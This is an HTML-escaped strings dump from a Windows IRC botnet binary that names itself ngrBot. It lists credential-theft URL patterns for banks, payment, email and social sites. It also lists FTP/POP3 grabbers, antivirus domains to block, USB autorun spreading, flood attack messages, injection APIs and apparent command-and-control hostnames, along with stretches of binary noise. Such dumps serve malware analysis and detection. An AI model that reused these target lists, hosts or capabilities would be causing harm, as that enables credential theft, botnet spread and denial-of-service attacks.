%s).&lt;br /&gt;PRIVMSG %255s&lt;br /&gt;JOIN %255s&lt;br /&gt;PRIVMSG&lt;br /&gt;JOIN&lt;br /&gt;%s:%d&lt;br /&gt;NtSetInformationProcess&lt;br /&gt;%s.%s%s&lt;br /&gt;%S%s%s&lt;br /&gt;HKCU\&lt;br /&gt;HKLM\&lt;br /&gt;%s.%S%S&lt;br /&gt;%S%S%S&lt;br /&gt;state_%s&lt;br /&gt;%s.%s (p='%S')&lt;br /&gt;pop3://%s:%s@%s:%d&lt;br /&gt;popgrab&lt;br /&gt;%s:%s@%s:%d&lt;br /&gt;anonymous&lt;br /&gt;ftp://%s:%s@%s:%d&lt;br /&gt;ftpgrab&lt;br /&gt;%s.%s -&amp;gt;&amp;gt; %s (%s : %s)&lt;br /&gt;%s.%s -&amp;gt;&amp;gt; %s : %s&lt;br /&gt;Directadmin&lt;br /&gt;WHCMS&lt;br /&gt;cPanel&lt;br /&gt;blog&lt;br /&gt;%s-%s-%s&lt;br /&gt;ffgrab&lt;br /&gt;iegrab&lt;br /&gt;%s.Blocked possible browser exploit pack call on URL '%s'&lt;br /&gt;%s.Blocked possible browser exploit pack call on URL '%S'&lt;br /&gt;webroot.&lt;br /&gt;fortinet.&lt;br /&gt;virusbuster.nprotect.&lt;br /&gt;gdatasoftware.&lt;br /&gt;virus.&lt;br /&gt;precisesecurity.&lt;br /&gt;lavasoft.&lt;br /&gt;heck.tc&lt;br /&gt;emsisoft.&lt;br /&gt;onlinemalwarescanner.&lt;br /&gt;onecare.live.&lt;br /&gt;f-secure.&lt;br /&gt;bullguard.&lt;br /&gt;clamav.&lt;br /&gt;pandasecurity.&lt;br /&gt;sophos.&lt;br /&gt;malwarebytes.&lt;br /&gt;sunbeltsoftware.&lt;br /&gt;norton.&lt;br /&gt;norman.&lt;br /&gt;mcafee.&lt;br /&gt;symantec&lt;br /&gt;comodo.&lt;br /&gt;avast.&lt;br /&gt;avira.&lt;br /&gt;avg.&lt;br /&gt;bitdefender.&lt;br /&gt;eset.&lt;br /&gt;kaspersky.&lt;br /&gt;trendmicro.&lt;br /&gt;iseclab.&lt;br /&gt;virscan.&lt;br /&gt;garyshood.&lt;br /&gt;viruschief.&lt;br /&gt;jotti.&lt;br /&gt;threatexpert.&lt;br /&gt;novirusthanks.&lt;br /&gt;virustotal.&lt;br /&gt;login[password]&lt;br /&gt;login[username]&lt;br /&gt;*members*.iknowthatgirl*/members*&lt;br /&gt;IKnowThatGirl&lt;br /&gt;*youporn.*/login*&lt;br /&gt;YouPorn&lt;br /&gt;*members.brazzers.com*&lt;br /&gt;Brazzers&lt;br /&gt;clave&lt;br /&gt;numeroTarjeta&lt;br /&gt;*clave=*&lt;br /&gt;*bcointernacional*login*&lt;br /&gt;Bcointernacional&lt;br /&gt;*:2222/CMD_LOGIN*&lt;br /&gt;*whcms*dologin*&lt;br /&gt;*:2086/login*&lt;br /&gt;*:2083/login*&lt;br /&gt;*:2082/login*&lt;br /&gt;*webnames.ru/*user_login*&lt;br /&gt;Webnames&lt;br /&gt;*dotster.com/*login*&lt;br /&gt;Dotster&lt;br /&gt;loginid&lt;br /&gt;*enom.com/login*&lt;br /&gt;Enom&lt;br /&gt;login.Pass&lt;br /&gt;login.User&lt;br /&gt;*login.Pass=*&lt;br /&gt;*1and1.com/xml/config*&lt;br /&gt;1and1&lt;br /&gt;token&lt;br /&gt;*moniker.com/*Login*&lt;br /&gt;Moniker&lt;br /&gt;LoginPassword&lt;br /&gt;LoginUserName&lt;br /&gt;*LoginPassword=*&lt;br /&gt;*namecheap.com/*login*&lt;br /&gt;Namecheap&lt;br /&gt;loginname&lt;br /&gt;*godaddy.com/login*&lt;br /&gt;Godaddy&lt;br /&gt;Password&lt;br /&gt;EmailName&lt;br /&gt;*Password=*&lt;br /&gt;*alertpay.com/login*&lt;br /&gt;Alertpay&lt;br /&gt;*netflix.com/*ogin*&lt;br /&gt;Netflix&lt;br /&gt;*thepiratebay.org/login*&lt;br /&gt;Thepiratebay&lt;br /&gt;*torrentleech.org/*login*&lt;br /&gt;Torrentleech&lt;br /&gt;*vip-file.com/*/signin-do*&lt;br /&gt;Vip-file&lt;br /&gt;*pas=*&lt;br /&gt;*sms4file.com/*/signin-do*&lt;br /&gt;Sms4file&lt;br /&gt;*letitbit.net*&lt;br /&gt;Letitbit&lt;br /&gt;*what.cd/login*&lt;br /&gt;Whatcd&lt;br /&gt;*oron.com/login*&lt;br /&gt;Oron&lt;br /&gt;*filesonic.com/*login*&lt;br /&gt;Filesonic&lt;br /&gt;*speedyshare.com/login*&lt;br /&gt;Speedyshare&lt;br /&gt;*pw=*&lt;br /&gt;*uploaded.to/*login*&lt;br /&gt;Uploaded&lt;br /&gt;*uploading.com/*login*&lt;br /&gt;Uploading&lt;br /&gt;loginUserPassword&lt;br /&gt;loginUserName&lt;br /&gt;*loginUserPassword=*&lt;br /&gt;*fileserv.com/login*&lt;br /&gt;Fileserve&lt;br /&gt;*hotfile.com/login*&lt;br /&gt;Hotfile&lt;br /&gt;*4shared.com/login*&lt;br /&gt;4shared&lt;br /&gt;txtpass&lt;br /&gt;txtuser&lt;br /&gt;*txtpass=*&lt;br /&gt;*netload.in/index*&lt;br /&gt;Netload&lt;br /&gt;*freakshare.com/login*&lt;br /&gt;Freakshare&lt;br /&gt;login_pass&lt;br /&gt;*login_pass=*&lt;br /&gt;*mediafire.com/*login*&lt;br /&gt;Mediafire&lt;br /&gt;*sendspace.com/login*&lt;br /&gt;Sendspace&lt;br /&gt;*megaupload.*/*login*&lt;br /&gt;Megaupload&lt;br /&gt;*depositfiles.*/*/login*&lt;br /&gt;Depositfiles&lt;br /&gt;userid&lt;br /&gt;*signin.ebay*SignIn&lt;br /&gt;eBay&lt;br /&gt;*officebanking.cl/*login.asp*&lt;br /&gt;OfficeBanking&lt;br /&gt;*secure.logmein.*/*logincheck*&lt;br /&gt;LogMeIn&lt;br /&gt;session[password]&lt;br /&gt;session[username_or_email]&lt;br /&gt;*password]=*&lt;br /&gt;*twitter.com/sessions&lt;br /&gt;Twitter&lt;br /&gt;txtPassword&lt;br /&gt;txtEmail&lt;br /&gt;*&amp;amp;txtPassword=*&lt;br /&gt;*.moneybookers.*/*login.pl&lt;br /&gt;Moneybookers&lt;br /&gt;*runescape*/*weblogin*&lt;br /&gt;Runescape&lt;br /&gt;*dyndns*/account*&lt;br /&gt;DynDNS&lt;br /&gt;*&amp;amp;password=*&lt;br /&gt;*no-ip*/login*&lt;br /&gt;NoIP&lt;br /&gt;*steampowered*/login*&lt;br /&gt;Steam&lt;br /&gt;quick_password&lt;br /&gt;quick_username&lt;br /&gt;username&lt;br /&gt;*hackforums.*/member.php&lt;br /&gt;Hackforums&lt;br /&gt;email&lt;br /&gt;*facebook.*/login.php*&lt;br /&gt;Facebook&lt;br /&gt;*login.yahoo.*/*login*&lt;br /&gt;Yahoo&lt;br /&gt;passwd&lt;br /&gt;login&lt;br /&gt;*passwd=*&lt;br /&gt;*login.live.*/*post.srf*&lt;br /&gt;Live&lt;br /&gt;TextfieldPassword&lt;br /&gt;TextfieldEmail&lt;br /&gt;*TextfieldPassword=*&lt;br /&gt;*gmx.*/*FormLogin*&lt;br /&gt;*Passwd=*&lt;br /&gt;Gmail&lt;br /&gt;FLN-Password&lt;br /&gt;FLN-UserName&lt;br /&gt;*FLN-Password=*&lt;br /&gt;*fastmail.*/mail/*&lt;br /&gt;Fastmail&lt;br /&gt;pass&lt;br /&gt;user&lt;br /&gt;*pass=*&lt;br /&gt;*bigstring.*/*index.php*&lt;br /&gt;BigString&lt;br /&gt;screenname&lt;br /&gt;*screenname.aol.*/login.psp*&lt;br /&gt;password&lt;br /&gt;loginId&lt;br /&gt;*password=*&lt;br /&gt;*aol.*/*login.psp*&lt;br /&gt;Passwd&lt;br /&gt;Email&lt;br /&gt;*service=youtube*&lt;br /&gt;*google.*/*ServiceLoginAuth*&lt;br /&gt;YouTube&lt;br /&gt;login_password&lt;br /&gt;login_email&lt;br /&gt;*login_password=*&lt;br /&gt;*paypal.*/webscr?cmd=_login-submit*&lt;br /&gt;PayPal&lt;br /&gt;%s / ?%d HTTP/1.1&lt;br /&gt;Host: %s&lt;br /&gt;User-Agent: %s&lt;br /&gt;Keep-Alive: 300&lt;br /&gt;Connection: keep-alive&lt;br /&gt;Content-Length: 42&lt;br /&gt;POST&lt;br /&gt;Mozilla/4.0&lt;br /&gt;Connection: Close&lt;br /&gt;X-a: b&lt;br /&gt;\\.\PHYSICALDRIVE0&lt;br /&gt;00100&lt;br /&gt;SeShutdownPrivilege&lt;br /&gt;NtShutdownSystem&lt;br /&gt;This binary is invalid.&lt;br /&gt;Main reasons:&lt;br /&gt;- you stupid cracker&lt;br /&gt;- you stupid cracker...&lt;br /&gt;- you stupid cracker?!&lt;br /&gt;ngrBot Error&lt;br /&gt;shell32.dll&lt;br /&gt;http&lt;br /&gt;httpi&lt;br /&gt;usbi&lt;br /&gt;dnsapi.dll&lt;br /&gt;DnsFlushResolverCache&lt;br /&gt;http://%s/%s&lt;br /&gt;http://%s/&lt;br /&gt;HTTP&lt;br /&gt;Host: &lt;br /&gt;POST /%1023s&lt;br /&gt;{%s&amp;#124;%s%s}%s&lt;br /&gt;n%s{%s&amp;#124;%s%s}%s&lt;br /&gt;&amp;lt;br&amp;gt;&lt;br /&gt;admin&lt;br /&gt;isadmin&lt;br /&gt;%s&amp;#124;%s&amp;#124;%s&lt;br /&gt;[DNS]: Redirecting &amp;quot;%s&amp;quot; to &amp;quot;%s&amp;quot;&lt;br /&gt;disabled&lt;br /&gt;enabled&lt;br /&gt;%s&amp;#124;%s&lt;br /&gt;[Logins]: Cleared %d logins&lt;br /&gt;#user&lt;br /&gt;#admin&lt;br /&gt;#new&lt;br /&gt;removing&lt;br /&gt;exiting&lt;br /&gt;reconnecting&lt;br /&gt;MOTD&lt;br /&gt;bsod&lt;br /&gt;disable&lt;br /&gt;POP3 -&amp;gt; &lt;br /&gt;FTP -&amp;gt; &lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Download error: MD5 mismatch (%s != %s)&lt;br /&gt;dlds&lt;br /&gt;http://&lt;br /&gt;rebooting&lt;br /&gt;[Login]: %s&lt;br /&gt;[DNS]: Blocked %d domain(s) - Redirected %d domain(s)&lt;br /&gt;[Speed]: Estimated upload speed %d KB/s&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;ngrBot&lt;br /&gt;running&lt;br /&gt;IPC_Check&lt;br /&gt;shell\open\command=&lt;br /&gt;shell\explore\command=&lt;br /&gt;icon=shell32.dll,7&lt;br /&gt;useautoplay=1&lt;br /&gt;action=Open folder to view files&lt;br /&gt;shellexecute=&lt;br /&gt;[autorun]&lt;br /&gt;.lnk&lt;br /&gt;%windir%\system32\cmd.exe&lt;br /&gt;&amp;amp;&amp;amp;%%windir%%\explorer.exe %%cd%%%s&lt;br /&gt;/c &amp;quot;start %%cd%%RECYCLER\%s&lt;br /&gt;RECYCLER&lt;br /&gt;.inf&lt;br /&gt;%s%s&lt;br /&gt;\\.\%c:&lt;br /&gt;%s\%s&lt;br /&gt;%sautorun.tmp&lt;br /&gt;%sautorun.inf&lt;br /&gt;%c:\&lt;br /&gt;gdkWindowToplevelClass&lt;br /&gt;%0x.exe&lt;br /&gt;comment-text&lt;br /&gt;*bebo.*/c/home/ajax_post_lifestream_comment&lt;br /&gt;bebo Lifestream&lt;br /&gt;*bebo.*/c/profile/comment_post.json&lt;br /&gt;bebo Comment&lt;br /&gt;Message&lt;br /&gt;*bebo.*/mail/MailCompose.jsp*&lt;br /&gt;bebo Message&lt;br /&gt;*friendster.*/sendmessage.php*&lt;br /&gt;Friendster Message&lt;br /&gt;comment&lt;br /&gt;Friendster Comment&lt;br /&gt;shoutout&lt;br /&gt;*friendster.*/rpc.php&lt;br /&gt;Friendster Shoutout&lt;br /&gt;*vkontakte.ru/mail.php&lt;br /&gt;vkontakte Message&lt;br /&gt;*vkontakte.ru/wall.php&lt;br /&gt;vkontakte Wall&lt;br /&gt;message&lt;br /&gt;*vkontakte.ru/api.php&lt;br /&gt;vkontakte Chat&lt;br /&gt;text&lt;br /&gt;*twitter.*/*direct_messages/new*&lt;br /&gt;Twitter Message&lt;br /&gt;*twitter.*/*status*/update*&lt;br /&gt;Twitter Tweet&lt;br /&gt;status&lt;br /&gt;*facebook.*/ajax/*MessageComposerEndpoint.php*&lt;br /&gt;Facebook Message&lt;br /&gt;msg_text&lt;br /&gt;*facebook.*/ajax/chat/send.php*&lt;br /&gt;Facebook IM&lt;br /&gt;-_.!~*'()&lt;br /&gt;Content-Length: &lt;br /&gt;%s.%s hijacked!&lt;br /&gt;MSG %d %s %d&lt;br /&gt;MSG %d %1s&lt;br /&gt;SDG %d %d&lt;br /&gt;Reliability: &lt;br /&gt;From: &lt;br /&gt;Content-Length: %d&lt;br /&gt;X-MMS-IM-Format: &lt;br /&gt;SDG %d&lt;br /&gt;bmsn&lt;br /&gt;%s_0x%08X&lt;br /&gt;RegCreateKeyExW&lt;br /&gt;RegCreateKeyExA&lt;br /&gt;URLDownloadToFileW&lt;br /&gt;URLDownloadToFileA&lt;br /&gt;PR_Write&lt;br /&gt;DnsQuery_W&lt;br /&gt;DnsQuery_A&lt;br /&gt;InternetWriteFile&lt;br /&gt;HttpSendRequestW&lt;br /&gt;HttpSendRequestA&lt;br /&gt;GetAddrInfoW&lt;br /&gt;s3nd&lt;br /&gt;CreateFileA&lt;br /&gt;MoveFileW&lt;br /&gt;MoveFileA&lt;br /&gt;DeleteFileW&lt;br /&gt;DeleteFileA&lt;br /&gt;CopyFileW&lt;br /&gt;CopyFileA&lt;br /&gt;NtQueryDirectoryFile&lt;br /&gt;NtEnumerateValueKey&lt;br /&gt;%08x&lt;br /&gt;OPEN&lt;br /&gt;DnsFree&lt;br /&gt;DnsQuery_A&lt;br /&gt;DNSAPI.dll&lt;br /&gt;FreeContextBuffer&lt;br /&gt;InitializeSecurityContextW&lt;br /&gt;FreeCredentialsHandle&lt;br /&gt;DeleteSecurityContext&lt;br /&gt;QueryContextAttributesW&lt;br /&gt;AcquireCredentialsHandleW&lt;br /&gt;EncryptMessage&lt;br /&gt;DecryptMessage&lt;br /&gt;InitializeSecurityContextA&lt;br /&gt;ApplyControlToken&lt;br /&gt;Secur32.dll&lt;br /&gt;SHGetSpecialFolderPathW&lt;br /&gt;SHGetFileInfoA&lt;br /&gt;ShellExecuteA&lt;br /&gt;SHELL32.dll&lt;br /&gt;InternetCloseHandle&lt;br /&gt;InternetReadFile&lt;br /&gt;InternetQueryDataAvailable&lt;br /&gt;HttpQueryInfoA&lt;br /&gt;InternetOpenUrlA&lt;br /&gt;InternetOpenA&lt;br /&gt;HttpQueryInfoW&lt;br /&gt;InternetQueryOptionW&lt;br /&gt;WININET&lt;br /&gt;.dll&lt;br /&gt;PathAppendW&lt;br /&gt;StrStrIA&lt;br /&gt;PathAppendA&lt;br /&gt;PathFindExtensionA&lt;br /&gt;SHLWAPI.dll&lt;br /&gt;WS2_32.dll&lt;br /&gt;memset&lt;br /&gt;wcsstr&lt;br /&gt;strstr&lt;br /&gt;wcsrchr&lt;br /&gt;??3@YAXPAX@Z&lt;br /&gt;atoi&lt;br /&gt;sscanf&lt;br /&gt;_strcmpi&lt;br /&gt;printf&lt;br /&gt;_snprintf&lt;br /&gt;sprintf&lt;br /&gt;strncpy&lt;br /&gt;_memicmp&lt;br /&gt;_wcsnicmp&lt;br /&gt;_vsnprintf&lt;br /&gt;_stricmp&lt;br /&gt;strtok&lt;br /&gt;strchr&lt;br /&gt;_snwprintf&lt;br /&gt;??2@YAPAXI@Z&lt;br /&gt;_strnicmp&lt;br /&gt;isxdigit&lt;br /&gt;memmove&lt;br /&gt;strncmp&lt;br /&gt;toupper&lt;br /&gt;strrchr&lt;br /&gt;vsprintf&lt;br /&gt;isalnum&lt;br /&gt;strncat&lt;br /&gt;MSVCRT.dll&lt;br /&gt;lstrcpyA&lt;br /&gt;MoveFileExA&lt;br /&gt;lstrcmpA&lt;br /&gt;WideCharToMultiByte&lt;br /&gt;MoveFileExW&lt;br /&gt;lstrcmpW&lt;br /&gt;ExitThread&lt;br /&gt;MultiByteToWideChar&lt;br /&gt;GetFileAttributesA&lt;br /&gt;SetFileAttributesW&lt;br /&gt;GetFileAttributesW&lt;br /&gt;LoadLibraryW&lt;br /&gt;CloseHandle&lt;br /&gt;SetFileTime&lt;br /&gt;CreateFileW&lt;br /&gt;GetFileTime&lt;br /&gt;GetSystemTimeAsFileTime&lt;br /&gt;WriteFile&lt;br /&gt;GetModuleHandleW&lt;br /&gt;GetLastError&lt;br /&gt;ReadFile&lt;br /&gt;GetTickCount&lt;br /&gt;HeapAlloc&lt;br /&gt;GetProcessHeap&lt;br /&gt;HeapFree&lt;br /&gt;lstrlenA&lt;br /&gt;Sleep&lt;br /&gt;WriteProcessMemory&lt;br /&gt;ReadProcessMemory&lt;br /&gt;InitializeCriticalSection&lt;br /&gt;LeaveCriticalSection&lt;br /&gt;EnterCriticalSection&lt;br /&gt;HeapReAlloc&lt;br /&gt;SetEvent&lt;br /&gt;ConnectNamedPipe&lt;br /&gt;CreateNamedPipeA&lt;br /&gt;CreateEventA&lt;br /&gt;DisconnectNamedPipe&lt;br /&gt;GetOverlappedResult&lt;br /&gt;WaitForMultipleObjects&lt;br /&gt;CreateFileA&lt;br /&gt;VirtualFreeEx&lt;br /&gt;VirtualAllocEx&lt;br /&gt;IsWow64Process&lt;br /&gt;CreateRemoteThread&lt;br /&gt;OpenProcess&lt;br /&gt;WaitForSingleObject&lt;br /&gt;ReleaseMutex&lt;br /&gt;MapViewOfFile&lt;br /&gt;OpenFileMappingA&lt;br /&gt;CreateFileMappingA&lt;br /&gt;InterlockedIncrement&lt;br /&gt;UnmapViewOfFile&lt;br /&gt;CreateMutexA&lt;br /&gt;GetVersionExA&lt;br /&gt;GetModuleFileNameW&lt;br /&gt;InterlockedCompareExchange&lt;br /&gt;CreateThread&lt;br /&gt;GetWindowsDirectoryW&lt;br /&gt;DeleteFileW&lt;br /&gt;GetTempFileNameW&lt;br /&gt;lstrcatW&lt;br /&gt;lstrcpynW&lt;br /&gt;DeleteFileA&lt;br /&gt;SetFileAttributesA&lt;br /&gt;lstrcpyW&lt;br /&gt;LocalFree&lt;br /&gt;LocalAlloc&lt;br /&gt;lstrcpynA&lt;br /&gt;SetFilePointer&lt;br /&gt;DeviceIoControl&lt;br /&gt;VirtualAlloc&lt;br /&gt;CreateProcessW&lt;br /&gt;ExitProcess&lt;br /&gt;lstrcatA&lt;br /&gt;GetVolumeInformationW&lt;br /&gt;GetLocaleInfoA&lt;br /&gt;FlushFileBuffers&lt;br /&gt;CopyFileW&lt;br /&gt;FindClose&lt;br /&gt;FindNextFileA&lt;br /&gt;FindFirstFileA&lt;br /&gt;SetCurrentDirectoryA&lt;br /&gt;LockFile&lt;br /&gt;GetFileSize&lt;br /&gt;CreateDirectoryA&lt;br /&gt;GetLogicalDriveStringsA&lt;br /&gt;OpenMutexA&lt;br /&gt;GetModuleFileNameA&lt;br /&gt;GetWindowsDirectoryA&lt;br /&gt;KERNEL32.dll&lt;br /&gt;MessageBoxA&lt;br /&gt;wvsprintfA&lt;br /&gt;wsprintfW&lt;br /&gt;DefWindowProcA&lt;br /&gt;DispatchMessageA&lt;br /&gt;TranslateMessage&lt;br /&gt;GetMessageA&lt;br /&gt;RegisterDeviceNotificationA&lt;br /&gt;CreateWindowExA&lt;br /&gt;RegisterClassExA&lt;br /&gt;USER32.dll&lt;br /&gt;CryptGetHashParam&lt;br /&gt;CryptDestroyHash&lt;br /&gt;CryptHashData&lt;br /&gt;CryptReleaseContext&lt;br /&gt;CryptCreateHash&lt;br /&gt;CryptAcquireContextA&lt;br /&gt;AdjustTokenPrivileges&lt;br /&gt;LookupPrivilegeValueA&lt;br /&gt;OpenProcessToken&lt;br /&gt;RegCloseKey&lt;br /&gt;RegSetValueExW&lt;br /&gt;RegCreateKeyExW&lt;br /&gt;RegNotifyChangeKeyValue&lt;br /&gt;RegSetValueExA&lt;br /&gt;RegOpenKeyExA&lt;br /&gt;ADVAPI32.dll&lt;br /&gt;CoCreateInstance&lt;br /&gt;CoInitialize&lt;br /&gt;ole32.dll&lt;br /&gt; n;^&lt;br /&gt;Qkkbal&lt;br /&gt;i]Wb&lt;br /&gt;9a&amp;amp;g&lt;br /&gt;MGiI&lt;br /&gt;wn&amp;gt;Jj&lt;br /&gt;#.zf&lt;br /&gt;+o*7&lt;br /&gt;!!!!!!!!&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@&lt;br /&gt;@@@@@@@@@&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;@@@@@@&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x&lt;br /&gt;d.xludakx.com&lt;br /&gt;MrDD&lt;br /&gt;ab.0n3mmm.com&lt;br /&gt;MrDD&lt;br /&gt;pusikuracbre.com&lt;br /&gt;MrDD&lt;br /&gt;#darkfear##&lt;br /&gt;redem&lt;br /&gt;admin&lt;br /&gt;1.1.0.0&lt;br /&gt;MrDD&lt;br /&gt;jkfdsfds67567dsf&lt;br /&gt;NAZEL&lt;br /&gt;NAZELup&lt;br /&gt;KOSOMAKYAD&lt;br /&gt;msn.set&lt;br /&gt;msn.int&lt;br /&gt;http.set&lt;br /&gt;http.int&lt;br /&gt;http.inj&lt;br /&gt;mdns&lt;br /&gt;stats&lt;br /&gt;speed&lt;br /&gt;logins&lt;br /&gt;slow&lt;br /&gt;ssyn&lt;br /&gt;stop&lt;br /&gt;{\XA&lt;br /&gt;+&amp;#124;XA&lt;br /&gt;54YA&lt;br /&gt;Z&amp;lt;YA&lt;br /&gt;k8WA&lt;br /&gt;PASS %s&lt;br /&gt;[.ShellClassInfo]&lt;br /&gt;CLSID={645FF040-5081-101B-9F08-00AA002F954E}&lt;br /&gt;USER %s 0 0 :%s&lt;br /&gt;NICK %s&lt;br /&gt;JOIN %s %s&lt;br /&gt;PART %s&lt;br /&gt;PRIVMSG %s :%s&lt;br /&gt;QUIT :%s&lt;br /&gt;PONG %s&lt;br /&gt;PING&lt;br /&gt;PRIVMSG&lt;br /&gt;[v=&amp;quot;%s&amp;quot; c=&amp;quot;%s&amp;quot; h=&amp;quot;%s&amp;quot; p=&amp;quot;%S&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Updated bot file &amp;quot;%S&amp;quot; - Download retries: %d&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Executed file &amp;quot;%S&amp;quot; - Download retries: %d&lt;br /&gt;[Slowloris]: Starting flood on &amp;quot;%s&amp;quot; for %d&lt;br /&gt; minute(s)&lt;br /&gt;[Slowloris]: Finished flood on &amp;quot;%s&amp;quot;&lt;br /&gt;[UDP]: Starting flood on &amp;quot;%s:%d&amp;quot; for %d second(s)&lt;br /&gt;[UDP]: Finished flood on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[SYN]: Starting flood on &amp;quot;%s:%d&amp;quot; for %d second(s)&lt;br /&gt;[SYN]: Finished flood on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[USB]: Infected %s&lt;br /&gt;[MSN]: Updated MSN spread message to &amp;quot;%s&amp;quot;&lt;br /&gt;[MSN]: Updated MSN spread interval to &amp;quot;%s&amp;quot;&lt;br /&gt;[HTTP]: Updated HTTP spread message to &amp;quot;%s&amp;quot;&lt;br /&gt;[HTTP]: Injected value is now %s.&lt;br /&gt;[HTTP]: Updated HTTP spread interval to &amp;quot;%s&amp;quot;&lt;br /&gt;[Visit]: Visited &amp;quot;%s&amp;quot;&lt;br /&gt;[DNS]: Blocked &amp;quot;%s&amp;quot;&lt;br /&gt;[usb=&amp;quot;%d&amp;quot; msn=&amp;quot;%d&amp;quot; http=&amp;quot;%d&amp;quot; total=&amp;quot;%d&amp;quot;]&lt;br /&gt;[ftp=&amp;quot;%d&amp;quot; pop=&amp;quot;%d&amp;quot; http=&amp;quot;%d&amp;quot; total=&amp;quot;%d&amp;quot;]&lt;br /&gt;[RSOCK4]: Started rsock4 on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[RSOCK4]: Stopped rsock4&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Update error: MD5 mismatch (%s != %s)&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error downloading file [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error writing download to &amp;quot;%S&amp;quot; [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Error creating process &amp;quot;%S&amp;quot; [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] File &amp;quot;%S&amp;quot; has an invalid binary type. [type=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error getting temporary filename. [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d='%s&amp;quot;] Error getting application data path [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[Visit]: Error visitng &amp;quot;%s&amp;quot;&lt;br /&gt;[FTP Login]: %s&lt;br /&gt;[POP3 Login]: %s&lt;br /&gt;[FTP Infect]: %s was iframed&lt;br /&gt;[HTTP Login]: %s&lt;br /&gt;[HTTP Traffic]: %s&lt;br /&gt;[Ruskill]: Detected File: &amp;quot;%s&amp;quot;&lt;br /&gt;[Ruskill]: Detected DNS: &amp;quot;%s&amp;quot;&lt;br /&gt;[Ruskill]: Detected Reg: &amp;quot;%s&amp;quot;&lt;br /&gt;[PDef+]: %s&lt;br /&gt;[DNS]: Blocked DNS &amp;quot;%s&amp;quot;&lt;br /&gt;[MSN]: %s&lt;br /&gt;[HTTP]: %s&lt;br /&gt;ftplog&lt;br /&gt;poplog&lt;br /&gt;ftpinfect&lt;br /&gt;httplogin&lt;br /&gt;httptraff&lt;br /&gt;ruskill&lt;br /&gt;rdns&lt;br /&gt;rreg&lt;br /&gt;httpspread&lt;br /&gt;http://api.wipmania.com/&lt;br /&gt;\\.\pipe\%08x_ipc&lt;br /&gt;0;0G0O0V0d0n0s0&lt;br /&gt;1)13181Y1e1u1&amp;#124;1&lt;br /&gt;2C2c2&lt;br /&gt;3 363M3j3u3&lt;br /&gt;6(6/686J6O6T6m6&lt;br /&gt;7 7(7O7V7_7&lt;br /&gt;7=8T8\8&lt;br /&gt;9#9:9W9^9f9~9&lt;br /&gt;98:R:[:&lt;br /&gt;;U&amp;lt;e&amp;lt;j&amp;lt;p&amp;lt;&lt;br /&gt;&amp;lt;g=o=&lt;br /&gt;&amp;gt;*&amp;gt;N&amp;gt;&lt;br /&gt;?%?/?6?A?P?&lt;br /&gt;0&amp;lt;0E0L0S0c0i0t0{0&lt;br /&gt;2!3-4d4n4s4&lt;br /&gt;5(5:5?5D5a5x5&lt;br /&gt;6 6J6a6&lt;br /&gt;7&amp;amp;7.7&amp;gt;7I7N7f7&lt;br /&gt;1#2_2&lt;br /&gt;8&amp;quot;8Q8X8g8q8&lt;br /&gt;9':;:Y:&lt;br /&gt;&amp;lt;'&amp;lt;1&amp;lt;H&amp;lt;X&amp;lt;x&amp;lt;&lt;br /&gt;=%=7=D=K=Z=w=}=&lt;br /&gt;&amp;gt;@&amp;gt;R&amp;gt;\&amp;gt;m&amp;gt;&lt;br /&gt;?1?&amp;lt;?B?j?&lt;br /&gt;0g0g1&lt;br /&gt;1&amp;quot;2Q2~2&lt;br /&gt;203N3&lt;br /&gt;424&amp;gt;4^4&lt;br /&gt;8;9~9&lt;br /&gt;:K:';A;_;&lt;br /&gt;&amp;lt;4&amp;lt;&amp;gt;&amp;lt;T&amp;lt;^&amp;lt;h&amp;lt;&lt;br /&gt;=*=&amp;gt;=D=N=l=u=&lt;br /&gt;&amp;gt;#&amp;gt;)&amp;gt;8&amp;gt;&amp;gt;&amp;gt;O&amp;gt;Y&amp;gt;^&amp;gt;p&amp;gt;u&amp;gt;&lt;br /&gt;?8?L?c?u?&lt;br /&gt;0$1-1H1N1_1n1&lt;br /&gt;313Y3k3&lt;br /&gt;414l4&lt;br /&gt;515B5P5u5&lt;br /&gt;676V6_6f6v6&lt;br /&gt;889Y9r9&lt;br /&gt;:-:G:&lt;br /&gt;;#;(;2;7;&amp;lt;;A;F;W;&lt;br /&gt;&amp;lt;5&amp;lt;?&amp;lt;^&amp;lt;&lt;br /&gt;&amp;lt;W=l=&amp;#124;=&lt;br /&gt;=d&amp;gt;o&amp;gt;{&amp;gt;&lt;br /&gt;?/?U?`?p?&lt;br /&gt;1P2T2X2&lt;br /&gt;3?4a4h4&lt;br /&gt;5A5H5&amp;#124;5&lt;br /&gt;7U8]8f8}8&lt;br /&gt;9'9-939q9&lt;br /&gt;: :%:n:&lt;br /&gt;;1;J;d;&lt;br /&gt;&amp;lt;%&amp;lt;3&amp;lt;&amp;lt;&amp;lt;B&amp;lt;i&amp;lt;v&amp;lt;&lt;br /&gt;=$=+=0===E=L=T=o=v=&lt;br 